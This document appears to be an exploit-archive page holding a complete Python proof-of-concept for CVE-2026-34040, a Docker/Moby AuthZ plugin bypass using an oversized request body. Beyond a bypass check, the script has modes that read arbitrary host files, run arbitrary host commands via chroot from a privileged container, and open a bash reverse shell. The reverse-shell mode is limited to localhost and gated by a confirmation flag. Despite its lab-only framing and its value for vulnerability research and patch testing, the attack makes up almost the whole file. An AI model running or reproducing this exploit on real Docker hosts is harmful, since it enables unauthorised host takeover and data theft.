5585 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3
"""
CVE-2026-34040 Lab PoC - Docker/Moby AuthZ plugin bypass via oversized request body.

Verified facts:
  CVE        : CVE-2026-34040
  CVSS 3.1   : 8.8  (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
  CWE        : CWE-288, CWE-863
  Affected   : moby/moby < 29.3.1, moby/moby/v2 < 2.0.0-beta.8
  Fixed in   : 29.3.1, 2.0.0-beta.8
  Root cause : incomplete fix for CVE-2024-41110
  Mechanism  : a request body > maxBodySize (1MB in vulnerable versions) makes the
               daemon forward an EMPTY body to the AuthZ plugin while the daemon
               itself processes the full original request -> AuthZ bypass.

Modes:
  check                Compare small request vs oversized request.
  read-host-file       Read a host file through privileged container + host bind mount.
  rce-proof            Write a marker file on the host using chroot.
  host-command         Run a user-provided command on the host through chroot.
  shell-container      Create and start a long-running privileged container for manual chroot.
  reverse-shell-local  Local lab reverse shell using host network mode.

Scope limitations:
  - Local UNIX socket only (/var/run/docker.sock); matches the official AV:L (Local) vector.
  - No remote TCP Docker API support
  - No scanning
  - Intended for authorized lab environments only
"""

from __future__ import annotations

import argparse
import json
import os
import re
import shlex
import socket
import sys
import time
from typing import Optional, Tuple


DEFAULT_SOCKET = "/var/run/docker.sock"
DEFAULT_API_VERSION = "v1.51"
DEFAULT_IMAGE = "alpine"
PADDING_SIZE = 1024 * 1024 + 1
LABEL_BASE = {
    "poc": "cve-2026-34040-full-lab",
    "lab_only": "true",
}


def oversized_labels() -> dict:
    labels = dict(LABEL_BASE)
    labels["padding"] = "A" * PADDING_SIZE
    return labels


def docker_request(
    sock_path: str,
    method: str,
    path: str,
    body: bytes = b"",
    timeout: int = 20,
) -> Tuple[int, str, bytes]:
    if not os.path.exists(sock_path):
        raise FileNotFoundError(f"Docker socket not found: {sock_path}")

    req = (
        f"{method} {path} HTTP/1.1\r\n"
        "Host: docker\r\n"
        "User-Agent: cve-2026-34040-full-lab-poc\r\n"
        "Content-Type: application/json\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("utf-8") + body

    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect(sock_path)
        s.sendall(req)

        chunks = []
        while True:
            try:
                data = s.recv(65536)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)

    raw = b"".join(chunks)
    header, _, response_body = raw.partition(b"\r\n\r\n")
    status_line = header.split(b"\r\n", 1)[0].decode("latin-1", errors="replace")

    try:
        status_code = int(status_line.split()[1])
    except Exception:
        status_code = 0

    return status_code, status_line, response_body


def json_body(payload: dict) -> bytes:
    return json.dumps(payload, separators=(",", ":")).encode("utf-8")


def parse_json_response(body: bytes) -> dict:
    try:
        return json.loads(body.decode("utf-8", errors="replace"))
    except Exception:
        return {}


def extract_container_id(body: bytes) -> Optional[str]:
    data = parse_json_response(body)
    cid = data.get("Id")
    if isinstance(cid, str) and cid:
        return cid
    return None


def print_response(prefix: str, status_line: str, body: bytes, max_body: int = 400) -> None:
    print(f"{prefix}: {status_line}")
    if body:
        text = body[:max_body].decode("utf-8", errors="replace")
        print(f"{prefix} body: {text}")


def create_container(
    sock: str,
    api: str,
    name: str,
    payload: dict,
    timeout: int,
) -> Tuple[int, str, bytes, Optional[str]]:
    path = f"/{api}/containers/create?name={name}"
    body = json_body(payload)
    status, line, resp = docker_request(sock, "POST", path, body, timeout)
    return status, line, resp, extract_container_id(resp)


def start_container(sock: str, api: str, cid: str, timeout: int) -> Tuple[int, str, bytes]:
    return docker_request(sock, "POST", f"/{api}/containers/{cid}/start", b"", timeout)


def logs_container(sock: str, api: str, cid: str, timeout: int) -> Tuple[int, str, bytes]:
    return docker_request(
        sock,
        "GET",
        f"/{api}/containers/{cid}/logs?stdout=true&stderr=true",
        b"",
        timeout,
    )


def remove_container(sock: str, api: str, cid: str, timeout: int) -> None:
    status, line, body = docker_request(
        sock,
        "DELETE",
        f"/{api}/containers/{cid}?force=true",
        b"",
        timeout,
    )
    if status in (204, 404):
        print(f"[cleanup] removed or already gone: {cid[:12]}")
    else:
        print_response("[cleanup warning]", line, body)


def wait_short() -> None:
    time.sleep(1.2)


def require_explicit_host_execution(args: argparse.Namespace) -> None:
    if not args.i_understand_this_runs_on_host:
        print(
            "This mode can execute commands on the host in your lab.\n"
            "Re-run with --i-understand-this-runs-on-host if this is your authorized test VM.",
            file=sys.stderr,
        )
        raise SystemExit(2)


def build_check_payload(image: str, oversized: bool) -> dict:
    labels = oversized_labels() if oversized else dict(LABEL_BASE)
    return {
        "Image": image,
        "Cmd": ["true"],
        "HostConfig": {
            "Privileged": True
        },
        "Labels": labels,
    }


def mode_check(args: argparse.Namespace) -> int:
    unique = int(time.time())
    small_name = f"cve-34040-small-{unique}"
    big_name = f"cve-34040-big-{unique}"

    print("=" * 72)
    print("CVE-2026-34040 AuthZ bypass check")
    print("=" * 72)

    small_payload = build_check_payload(args.image, oversized=False)
    big_payload = build_check_payload(args.image, oversized=True)

    print("[1] Small request: AuthZ should block this")
    print(f"    payload size: {len(json_body(small_payload))} bytes")
    s_status, s_line, s_body, s_id = create_container(
        args.socket, args.api_version, small_name, small_payload, args.timeout
    )
    print_response("    response", s_line, s_body)
    if s_id and not args.keep:
        remove_container(args.socket, args.api_version, s_id, args.timeout)

    print()
    print("[2] Oversized request: vulnerable target may pass AuthZ")
    print(f"    payload size: {len(json_body(big_payload))} bytes")
    b_status, b_line, b_body, b_id = create_container(
        args.socket, args.api_version, big_name, big_payload, args.timeout
    )
    print_response("    response", b_line, b_body)
    if b_id and not args.keep:
        remove_container(args.socket, args.api_version, b_id, args.timeout)

    print()
    print("=" * 72)
    print("Interpretation")
    print("=" * 72)
    if s_status != 403:
        print("[!] Baseline request was not blocked. AuthZ policy may not be enforcing privileged checks.")
    elif b_status == 403:
        print("[-] Oversized request was blocked. Target appears patched/protected.")
    elif b_status in (201, 404, 400, 409):
        print("[+] Bypass behavior observed: small request was denied, oversized request reached Docker processing.")
        if b_status == 404:
            print("    404 usually means the image is missing. Run: sudo docker pull alpine")
    else:
        print("[?] Inconclusive. Review response details manually.")
    return 0


def mode_read_host_file(args: argparse.Namespace) -> int:
    unique = int(time.time())
    name = f"cve-34040-read-{unique}"

    host_file = args.host_file
    if not host_file.startswith("/"):
        print("--host-file must be an absolute path like /etc/hostname", file=sys.stderr)
        return 2

    # Avoid shell interpolation: pass file path directly to cat.
    payload = {
        "Image": args.image,
        "Cmd": ["cat", f"/host{host_file}"],
        "HostConfig": {
            "Privileged": True,
            "Binds": ["/:/host:ro"],
        },
        "Labels": oversized_labels(),
    }

    print("=" * 72)
    print("CVE-2026-34040 impact demo: read host file")
    print("=" * 72)
    print(f"target host file: {host_file}")
    status, line, body, cid = create_container(args.socket, args.api_version, name, payload, args.timeout)
    print_response("[create]", line, body)

    if not cid:
        print("No container was created.")
        return 1

    print(f"[container] {cid}")
    start_status, start_line, start_body = start_container(args.socket, args.api_version, cid, args.timeout)
    print_response("[start]", start_line, start_body)

    wait_short()
    log_status, log_line, log_body = logs_container(args.socket, args.api_version, cid, args.timeout)
    print_response("[logs]", log_line, log_body, max_body=4000)

    if not args.keep:
        remove_container(args.socket, args.api_version, cid, args.timeout)
    else:
        print(f"[keep] container kept: {cid}")

    return 0


def mode_rce_proof(args: argparse.Namespace) -> int:
    require_explicit_host_execution(args)

    unique = int(time.time())
    name = f"cve-34040-rce-proof-{unique}"
    marker = "/tmp/cve_2026_34040_rce_proof"

    host_cmd = (
        f"id > {shlex.quote(marker)}; "
        f"hostname >> {shlex.quote(marker)}; "
        f"whoami >> {shlex.quote(marker)}; "
        f"date >> {shlex.quote(marker)}"
    )

    payload = {
        "Image": args.image,
        "Cmd": [
            "/bin/sh",
            "-c",
            f"chroot /host /bin/bash -lc {shlex.quote(host_cmd)} && cat /host{marker}",
        ],
        "HostConfig": {
            "Privileged": True,
            "Binds": ["/:/host"],
        },
        "Labels": oversized_labels(),
    }

    print("=" * 72)
    print("CVE-2026-34040 impact demo: host RCE proof")
    print("=" * 72)
    print(f"marker file on host: {marker}")

    status, line, body, cid = create_container(args.socket, args.api_version, name, payload, args.timeout)
    print_response("[create]", line, body)

    if not cid:
        print("No container was created.")
        return 1

    print(f"[container] {cid}")
    start_status, start_line, start_body = start_container(args.socket, args.api_version, cid, args.timeout)
    print_response("[start]", start_line, start_body)

    wait_short()
    log_status, log_line, log_body = logs_container(args.socket, args.api_version, cid, args.timeout)
    print_response("[logs]", log_line, log_body, max_body=4000)

    print()
    print("Verify on host:")
    print(f"  cat {marker}")
    print("Cleanup:")
    print(f"  sudo rm -f {marker}")

    if not args.keep:
        remove_container(args.socket, args.api_version, cid, args.timeout)
    else:
        print(f"[keep] container kept: {cid}")

    return 0


def mode_host_command(args: argparse.Namespace) -> int:
    require_explicit_host_execution(args)

    if not args.cmd:
        print("--cmd is required for host-command mode", file=sys.stderr)
        return 2

    unique = int(time.time())
    name = f"cve-34040-host-cmd-{unique}"

    payload = {
        "Image": args.image,
        "Cmd": [
            "/bin/sh",
            "-c",
            f"chroot /host /bin/bash -lc {shlex.quote(args.cmd)}",
        ],
        "HostConfig": {
            "Privileged": True,
            "Binds": ["/:/host"],
        },
        "Labels": oversized_labels(),
    }

    print("=" * 72)
    print("CVE-2026-34040 impact demo: host command")
    print("=" * 72)
    print(f"command: {args.cmd}")

    status, line, body, cid = create_container(args.socket, args.api_version, name, payload, args.timeout)
    print_response("[create]", line, body)

    if not cid:
        print("No container was created.")
        return 1

    print(f"[container] {cid}")
    start_status, start_line, start_body = start_container(args.socket, args.api_version, cid, args.timeout)
    print_response("[start]", start_line, start_body)

    wait_short()
    log_status, log_line, log_body = logs_container(args.socket, args.api_version, cid, args.timeout)
    print_response("[logs]", log_line, log_body, max_body=4000)

    if not args.keep:
        remove_container(args.socket, args.api_version, cid, args.timeout)
    else:
        print(f"[keep] container kept: {cid}")

    return 0


def mode_shell_container(args: argparse.Namespace) -> int:
    unique = int(time.time())
    name = f"cve-34040-shell-{unique}"

    payload = {
        "Image": args.image,
        "Cmd": ["sleep", "infinity"],
        "HostConfig": {
            "Privileged": True,
            "Binds": ["/:/host"],
        },
        "Labels": oversized_labels(),
    }

    print("=" * 72)
    print("CVE-2026-34040 impact demo: long-running privileged container")
    print("=" * 72)

    status, line, body, cid = create_container(args.socket, args.api_version, name, payload, args.timeout)
    print_response("[create]", line, body)

    if not cid:
        print("No container was created.")
        return 1

    start_status, start_line, start_body = start_container(args.socket, args.api_version, cid, args.timeout)
    print_response("[start]", start_line, start_body)

    print()
    print("[container]")
    print(cid)
    print()
    print("Manual demo commands:")
    print(f"  sudo docker exec -it {cid} /bin/sh")
    print("  chroot /host /bin/bash")
    print("  id")
    print("  hostname")
    print("  whoami")
    print()
    print("Cleanup:")
    print(f"  sudo docker rm -f {cid}")

    if not args.keep:
        print()
        print("[note] This mode is useful with --keep. Container is kept by default for this mode.")
        print(f"[keep] container kept: {cid}")

    return 0


def mode_reverse_shell_local(args: argparse.Namespace) -> int:
    require_explicit_host_execution(args)

    if args.lhost not in ("127.0.0.1", "localhost"):
        print(
            "reverse-shell-local only allows --lhost 127.0.0.1 or localhost.\n"
            "This is intentional so the packaged lab PoC stays local-only.",
            file=sys.stderr,
        )
        return 2

    if not (1 <= args.lport <= 65535):
        print("--lport must be between 1 and 65535", file=sys.stderr)
        return 2

    unique = int(time.time())
    name = f"cve-34040-revshell-local-{unique}"

    rev_cmd = f"bash -i >& /dev/tcp/{args.lhost}/{args.lport} 0>&1"

    payload = {
        "Image": args.image,
        "Cmd": [
            "/bin/sh",
            "-c",
            f"chroot /host /bin/bash -lc {shlex.quote(rev_cmd)}",
        ],
        "HostConfig": {
            "Privileged": True,
            "Binds": ["/:/host"],
            "NetworkMode": "host",
        },
        "Labels": oversized_labels(),
    }

    print("=" * 72)
    print("CVE-2026-34040 impact demo: local reverse shell")
    print("=" * 72)
    print("Before running this mode, open another terminal on the same VM:")
    print(f"  nc -lvnp {args.lport}")
    print()
    print(f"reverse shell target: {args.lhost}:{args.lport}")

    status, line, body, cid = create_container(args.socket, args.api_version, name, payload, args.timeout)
    print_response("[create]", line, body)

    if not cid:
        print("No container was created.")
        return 1

    print(f"[container] {cid}")
    start_status, start_line, start_body = start_container(args.socket, args.api_version, cid, args.timeout)
    print_response("[start]", start_line, start_body)

    print()
    print("If listener is open, the shell should connect there.")
    print("Cleanup after demo:")
    print(f"  sudo docker rm -f {cid}")

    if args.keep:
        print(f"[keep] container kept: {cid}")

    return 0


def build_parser() -> argparse.ArgumentParser:
    parser = argparse.ArgumentParser(
        description="CVE-2026-34040 full lab PoC over local Docker UNIX socket"
    )
    parser.add_argument(
        "--mode",
        choices=[
            "check",
            "read-host-file",
            "rce-proof",
            "host-command",
            "shell-container",
            "reverse-shell-local",
        ],
        default="check",
        help="PoC mode",
    )
    parser.add_argument("--socket", default=DEFAULT_SOCKET, help="Docker UNIX socket path")
    parser.add_argument("--api-version", default=DEFAULT_API_VERSION, help="Docker API version, e.g. v1.51")
    parser.add_argument("--image", default=DEFAULT_IMAGE, help="Container image to use")
    parser.add_argument("--timeout", type=int, default=20, help="Socket timeout in seconds")
    parser.add_argument("--keep", action="store_true", help="Keep created containers where applicable")

    parser.add_argument("--host-file", default="/etc/hostname", help="Host file path for read-host-file mode")
    parser.add_argument("--cmd", help="Host command for host-command mode")
    parser.add_argument("--lhost", default="127.0.0.1", help="Local reverse shell host. Only 127.0.0.1/localhost allowed")
    parser.add_argument("--lport", type=int, default=4444, help="Local reverse shell port")
    parser.add_argument(
        "--i-understand-this-runs-on-host",
        action="store_true",
        help="Required for modes that execute commands on the host in the lab",
    )
    return parser


def main() -> int:
    args = build_parser().parse_args()

    if args.mode == "check":
        return mode_check(args)
    if args.mode == "read-host-file":
        return mode_read_host_file(args)
    if args.mode == "rce-proof":
        return mode_rce_proof(args)
    if args.mode == "host-command":
        return mode_host_command(args)
    if args.mode == "shell-container":
        return mode_shell_container(args)
    if args.mode == "reverse-shell-local":
        return mode_reverse_shell_local(args)

    print(f"Unknown mode: {args.mode}", file=sys.stderr)
    return 2


if __name__ == "__main__":
    try:
        raise SystemExit(main())
    except PermissionError:
        print("Permission denied. Try sudo or an account that can access /var/run/docker.sock.", file=sys.stderr)
        raise SystemExit(1)
    except FileNotFoundError as e:
        print(str(e), file=sys.stderr)
        raise SystemExit(1)